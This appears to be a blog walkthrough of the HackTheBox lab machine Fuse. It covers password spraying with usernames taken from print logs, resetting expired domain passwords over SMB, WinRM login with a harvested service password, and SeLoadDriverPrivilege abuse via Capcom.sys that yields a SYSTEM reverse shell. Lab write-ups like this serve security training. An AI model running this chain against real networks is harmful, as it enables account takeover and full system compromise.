HackTheBox Fuse Writeup – 10.10.10.193

HackTheBox Fuse – 10.10.10.193 is a new Medium difficulty Windows box by egre55. This is second Windows machine after Blackfield (writeup here) in a row released by HTB. My honest opinion on this box is the difficulty rating “Medium” is not fairly applied as this box is much harder than the previous box Blackfield. This box need at least a little programming knowledge that most of the users lacks.

Information Gathering

Let’s start with a port scan.

$ nmap -sC -sV -p- -oA fuse fuse.htb 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-17 10:00 +03
Nmap scan report for fuse.htb (10.10.10.193)
Host is up (0.16s latency).
Not shown: 65514 filtered ports
PORT      STATE SERVICE      VERSION
53/tcp    open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
80/tcp    open  http         Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-17 07:25:55Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       .NET Message Framing
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc        Microsoft Windows RPC
49672/tcp open  msrpc        Microsoft Windows RPC
49690/tcp open  msrpc        Microsoft Windows RPC
49751/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=6/17%Time=5EE9C162%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h37m41s, deviation: 4h02m30s, median: 17m40s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Fuse
|   NetBIOS computer name: FUSE\x00
|   Domain name: fabricorp.local
|   Forest name: fabricorp.local
|   FQDN: Fuse.fabricorp.local
|_  System time: 2020-06-17T00:28:16-07:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-06-17T07:28:18
|_  start_date: 2020-06-17T02:24:56

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 779.73 seconds

NMAP scan shows us, a large number of ports are open, which is normal situation while scanning Windows boxes. The scan as well shows the machine name is Fuse.fabricorp.local, and belongs to the active directory fabricorp.local and the OS is Windows Server 2016 Standard 6.3.

Enumeration

As we can see MS IIS is running on the port, let us visit the website hosted and see what is it.

Visiting the default page redirects us to an internal page “http://fuse.fabricorp.local/papercut/logs/html/index.htm” which looks like a PaperCut print management application. However, the page doesn’t open. Let us add the machine name to etc/hosts and see what happens.

Ok, the right application PaperCut print logger is loaded after adding fuse.fabricorp.local to our hosts file.

The Print logs in the PaperCut has log files that seem to have a number of usernames and internal system names. There are 2 types of files, HTML and CSV and the log is categorized per day and per month. Let us download and gather usernames first.

Downloaded CSVs:

Users:

$ cat usernames.txt
pmerton
tlavel
sthompson
bnielson
pmerton
bhult
administrator

SMB

As we can see SMB, but unable to list the share, we need credentials.

$ smbclient -L fuse.htb
Enter WORKGROUP\root's password: 
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
SMB1 disabled -- no workgroup available

After spending some time, I decided to see if there is a possibility to get passwords from the files I have.

$ cat *.csv* | cut -d ',' -f2,5-7 |tr '.' '\n' |tr -d '"' | tr ',' '\n' | tee password.txt
PaperCut Print Logger - http://www
papercut
com/
User
Printer
Document Name
Client
pmerton
HP-MFT01
New Starter - bnielson - Notepad
JUMP01
tlavel
HP-MFT01
IT Budget Meeting Minutes - Notepad
LONWK015
sthompson
HP-MFT01
backup_tapes - Notepad
LONWK019
sthompson
HP-MFT01
mega_mountain_tape_request
pdf
LONWK019
sthompson
HP-MFT01
Fabricorp01
docx - Word
LONWK019
PaperCut Print Logger - http://www
papercut
com/
User
Printer
Document Name
Client
pmerton
HP-MFT01
New Starter - bnielson - Notepad
JUMP01
tlavel
HP-MFT01
IT Budget Meeting Minutes - Notepad
LONWK015
PaperCut Print Logger - http://www
papercut
com/
User
Printer
Document Name
Client
sthompson
HP-MFT01
backup_tapes - Notepad
LONWK019
sthompson
HP-MFT01
mega_mountain_tape_request
pdf
LONWK019
sthompson
HP-MFT01
Untitled - Notepad
FUSE
sthompson
HP-MFT01
Fabricorp01
docx - Word
LONWK019
User
Printer
Document Name
Client
pmerton
HP-MFT01
New Starter - bnielson - Notepad
JUMP01
tlavel
HP-MFT01
IT Budget Meeting Minutes - Notepad
LONWK015
sthompson
HP-MFT01
backup_tapes - Notepad
LONWK019
sthompson
HP-MFT01
mega_mountain_tape_request
pdf
LONWK019
sthompson
HP-MFT01
Fabricorp01
docx - Word
LONWK019
PaperCut Print Logger - http://www
papercut
com/
User
Printer
Document Name
Client
bhult
HP-MFT01
offsite_dr_invocation - Notepad
LAPTOP07
administrator
HP-MFT01
printing_issue_test - Notepad
FUSE
PaperCut Print Logger - http://www
papercut
com/
User
Printer
Document Name
Client
bhult
HP-MFT01
offsite_dr_invocation - Notepad
LAPTOP07
administrator
HP-MFT01
printing_issue_test - Notepad
FUSE

After removing duplicates and file extension names, I have the list ready for Hydra SMB brute forcing.

In next few minutes, Hydra paired 3 users with valid credential Fabricorp01.

bhult:Fabricorp01
bnielson:Fabricorp01
tlavel:Fabricorp01

With valid credentials, I proceed to access SMB, I have the session setup failed error on all 3 users – NT_STATUS_PASSWORD_MUST_CHANGE

$ smbclient -L fuse.htb -U tlavel 
Enter WORKGROUP\tlavel's password: 
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE
-----------
$ smbclient -L fuse.htb -U bnielson
Enter WORKGROUP\bnielson's password: 
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE
-----------
$ smbclient -L fuse.htb -U tlavel  
Enter WORKGROUP\tlavel's password: 
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE

SMBPasswd

To access the SMB I need to change the password first. As I recall, Samba has a utility called “smbpasswd” to change a user’s SMB password. Let us see if I’ll be able to change prior to login.

The command goes like this:

smbpasswd [-a] [-c <config file>] [-x] [-d] [-e] [-D debuglevel] [-n] [-r <remote machine>] [-R <name resolve order>] [-m] [-U username[%password]] [-h] [-s] [-w pass] [-W] [-i] [-L] [username]

I tried to use the simple password to save time, but it looks like the password should meet the preset criteria.

$ smbpasswd -U bhult -r 10.10.10.193
Old SMB password:
New SMB password:
Retype new SMB password:
machine 10.10.10.193 rejected the password change: Error was : When trying to update a password, this status indicates that some password update rule has been violated. For example, the password might not meet length criteria..

Using a complex password I was able to set a new password for the user bhult and list the SMB shares.

$ smbpasswd -U bhult -r 10.10.10.193
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user bhult on 10.10.10.193.
------------/snip/-------------
$ smbclient -L fuse.htb -U bhult    
Enter WORKGROUP\bhult's password: 

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	HP-MFT01        Printer   HP-MFT01
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	print$          Disk      Printer Drivers
	SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available

After starting to enumerate what I noticed was the password resets after a certain period, probably after a minute or so. I had to reset my password several times before I fully enumerate things.

$ smbpasswd -U bnielson -r 10.10.10.193
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user bnielson on 10.10.10.193.

# root @ nav1n in ~/htb/fuse [12:21:58] 
$ smbclient -L fuse.htb -U bnielson    
Enter WORKGROUP\bnielson's password: 

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	HP-MFT01        Printer   HP-MFT01
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	print$          Disk      Printer Drivers
	SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available

And I as well noticed the directories shared between the users are the same, so I decided to wok with only one user, so I don’t need to change password for everyone when t resets.

RPCClient

As I’m able to authenticate the user, my next step is to list the users and possibly a service account that I could try to exploit.

# root @ nav1n in ~/htb/fuse [12:34:48] 
$ rpcclient -U bnielson 10.10.10.193
Enter WORKGROUP\bnielson's password: 
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[svc-print] rid:[0x450]
user:[bnielson] rid:[0x451]
user:[sthompson] rid:[0x641]
user:[tlavel] rid:[0x642]
user:[pmerton] rid:[0x643]
user:[svc-scan] rid:[0x645]
user:[bhult] rid:[0x1bbd]
user:[dandrews] rid:[0x1bbe]
user:[mberbatov] rid:[0x1db1]
user:[astein] rid:[0x1db2]
user:[dmuir] rid:[0x1db3]
rpcclient $> 

Enumerating Printers

The main goal of this machine is exploiting the printer to gain foothold and carrying it forward. So Let us explore the printers in the domain using RPC EnumPrinters command.

The EnumPrinters revealed a new password, looks like for the scan2docs, to make sure which user the password can be used, I run the hydra again and found two newly found service users “svc-print” and “svc-scan” are matched with the credential.

Getting User

I tried to find login page and SMB but I wasn’t succeeded. But Looking at my previously ran Enum4Linux results, I noticed user FABRICORP\svc-print is a member of the domain group FABRICORP\IT_Accounts and for my surprise IT_Accounts is a part of group “Remote Management Users”. This means I will be able to connect the box using svc-print and his password by WinRM – or Evil-WinRM.

Evil-WinRM

As assumed, I successfully managed to log-in to the system using Evil-WinRM and svc-print’s password. The user’s falg was found in the desktop and I grabbed it.

Privilege Escalation

As always, after getting the user shell, let us check the privileges of our current user.

The user svc-print has a special privilege called “SeLoadDriverPrivilege” allows the assigned user to install or uninstall a device driver. Its pretty normal to have a user who manages Printers to have this privilege. However, a simple misconfiguration would lead to privilege escalation. There are a lot of PoCs that lead from low level shell to Administrator abusing this privilege.

If you search Google “SeLoadDriverPrivilege Abuse”, the first result from “tarlogic.com” shows how to abuse the SeLaddriverPrivilege to gain the escalated privilege. As the above mentioned article says, I’m going to use Capcom.sys because it is a signed driver.

Let us start our rooting process. Firstly, I need to obtain the following files and Git-repo in order to build my own vulnerable executable file.

  1. CapCom.sys file: https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys
  2. ExploitCapcom: https://github.com/tandasat/ExploitCapcom
  3. EoPLoaderDriver: https://raw.githubusercontent.com/TarlogicSecurity/EoPLoadDriver/master/eoploaddriver.cpp

Once I have all the files ready with me, I compiled ExploitCapcom using my Visual Studio 2019 x64 Release mode and produced an exe file “ExploitCapcom.exe”

I as well build a simple exe file using c++ for my reverse connection.

Once I have everything, I upload the files into a temp directory and start my netcat listener in a separate terminal.

root@nav1n:~/htb/fuse # ruby evil-winrm.rb -i fuse.htb -u svc-print -p '$fab@s3Rv1ce$1'
Mode                LastWriteTime         Length Name                                                                                                                                                                                                    
----                -------------         ------ ----                                                                                                                                                                                                    
-a----        6/18/2020   6:01 AM          10576 Capcom.sys                                                                                                                                                                                              
-a----        6/18/2020   5:59 AM          69632 ExploitCapcom.exe                                                                                                                                                                                       
-a----        6/18/2020   6:00 AM          38616 nc.exe                                                                                                                                                                                                  
-a----        6/18/2020   6:00 AM          38400 Reverse.exe   

As I have required files and listener is up and running, I executed my vulnerable kernel module from the temp directory. The permission was enabled and the vulnerable driver was loaded to kernel successfully.

./ExploitCapcom.exe System\CurrentControlSet\fuser C:\temp\Capcom.sys
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\fuser
NTSTATUS: 00000000, WinError: 0

Exploiting

As the kernel is loaded let us exploit it using the below command so my listener get the reverse connection.

.\ExploitCapcom.exe C:\temp\Reverse.exe
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 000******
[*] Shellcode was placed at 0000*******
[+] Shellcode was executed
[+] Token stealing was successful
[+] Command Executed

So…. here is it, the listener is activated as System and I have the shell back as System.

Ncat: Connection from 10.10.10.193.
Ncat: Connection from 10.10.10.193:5138.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\temp>whoami
whoami
nt authority\system

That is the end of the story of Fuse machine and as well the end of HackTheBox Fuse Writeup. Thank you for your visit and reading.


References:

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n

You may also like...

Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments
Sorry, that action is blocked.